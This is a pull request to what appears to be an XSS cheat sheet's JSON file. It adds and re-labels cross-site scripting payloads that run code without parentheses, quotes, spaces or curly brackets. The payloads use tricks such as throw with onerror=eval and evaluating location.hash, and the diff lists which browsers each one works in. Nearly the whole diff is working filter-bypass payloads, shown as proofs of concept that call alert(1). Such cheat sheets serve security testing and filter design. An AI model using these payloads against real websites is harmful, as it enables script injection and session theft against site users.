### PR TITLE
Fix browsers compliance and add new vectors (no parentheses)

### DIFF
--- a/json/restricted_characters.json
+++ b/json/restricted_characters.json
@@ -63,6 +63,17 @@
         ]
     },
     {
+        "description": "No parentheses using exception handling and location hash eval on all browsers",
+        "code": "<script>throw onerror=Uncaught=eval,e=new Error,e.message='\/*'+location.hash,!!window.InstallTrigger?e:e.message<\/script>",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "hash": "#*/;alert(1);"
+    },
+    {
         "description": "No parentheses using ES6 hasInstance and instanceof with eval",
         "code": "<script>'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}<\/script>",
         "browsers": [

--- a/json/restricted_characters.json
+++ b/json/restricted_characters.json
@@ -74,6 +74,17 @@
         "hash": "#*/;alert(1);"
     },
     {
+        "description": "No parentheses, no quotes, no spaces using exception handling and location hash eval on all browsers",
+        "code": "<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message<\/script>",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "hash": "#*/;alert(1);"
+    },
+    {
         "description": "No parentheses using ES6 hasInstance and instanceof with eval",
         "code": "<script>'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}<\/script>",
         "browsers": [

--- a/json/restricted_characters.json
+++ b/json/restricted_characters.json
@@ -85,6 +85,17 @@
         "hash": "#*/;alert(1);"
     },
     {
+        "description": "No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers",
+        "code": "<script>throw\/x\/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message<\/script>",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "hash": "#*/;alert(1);"
+    },
+    {
         "description": "No parentheses using ES6 hasInstance and instanceof with eval",
         "code": "<script>'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}<\/script>",
         "browsers": [

--- a/json/restricted_characters.json
+++ b/json/restricted_characters.json
@@ -33,7 +33,7 @@
         "url": ""
     },
     {
-        "description": "No parentheses using exception handling and string eval on Chrome/Edge",
+        "description": "No parentheses using exception handling and string eval on Chrome / Edge",
         "code": "<script>throw onerror=eval,'=alert\\x281\\x29'<\/script>",
         "browsers": [
             "chrome",
@@ -52,6 +52,14 @@
         "code": "<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\\x281\\x29'}<\/script>",
         "browsers": [
             "firefox"
+        ]
+    },
+    {
+        "description": "No parentheses using exception handling and object eval on Firefox / Safari",
+        "code": "<script>throw onerror=eval,e=new Error,e.message='alert\\x281\\x29',e<\/script>",
+        "browsers": [
+            "firefox",
+            "safari"
         ]
     },
     {

--- a/json/restricted_characters.json
+++ b/json/restricted_characters.json
@@ -33,26 +33,26 @@
         "url": ""
     },
     {
-        "description": "No parentheses using exception handling and eval",
+        "description": "No parentheses using exception handling and string eval on Chrome/Edge",
         "code": "<script>throw onerror=eval,'=alert\\x281\\x29'<\/script>",
         "browsers": [
             "chrome",
-            "firefox",
-            "edge",
-            "safari"
-        ],
-        "url": ""
+            "edge"
+        ]
     },
     {
-        "description": "No parentheses using exception handling and eval on Firefox",
+        "description": "No parentheses using exception handling and string eval on Safari",
+        "code": "<script>throw onerror=eval,'alert\\x281\\x29'<\/script>",
+        "browsers": [
+            "safari"
+        ]
+    },
+    {
+        "description": "No parentheses using exception handling and object eval on Firefox",
         "code": "<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\\x281\\x29'}<\/script>",
         "browsers": [
-            "chrome",
-            "firefox",
-            "edge",
-            "safari"
-        ],
-        "url": ""
+            "firefox"
+        ]
     },
     {
         "description": "No parentheses using ES6 hasInstance and instanceof with eval",


### PR DESCRIPTION
Hello,

Just a little PR to:

- Fix some browsers compliance for "no parentheses" payloads (Firefox, Chrome, Edge, Safari).
- Add some generic vectors without parentheses, spaces, quotes, curly brackets for all browsers via location hash.

Thank you for your great resources and hard work!

PS: as indicated, can you update _XSS Cheat Sheet credits_ with my Twitter handle link (`@ycam_asafety`) or, if possible, directly to my website (`https://yann.cam`) (I am already on credits page, but not linked to any URL) ?

Sincerely,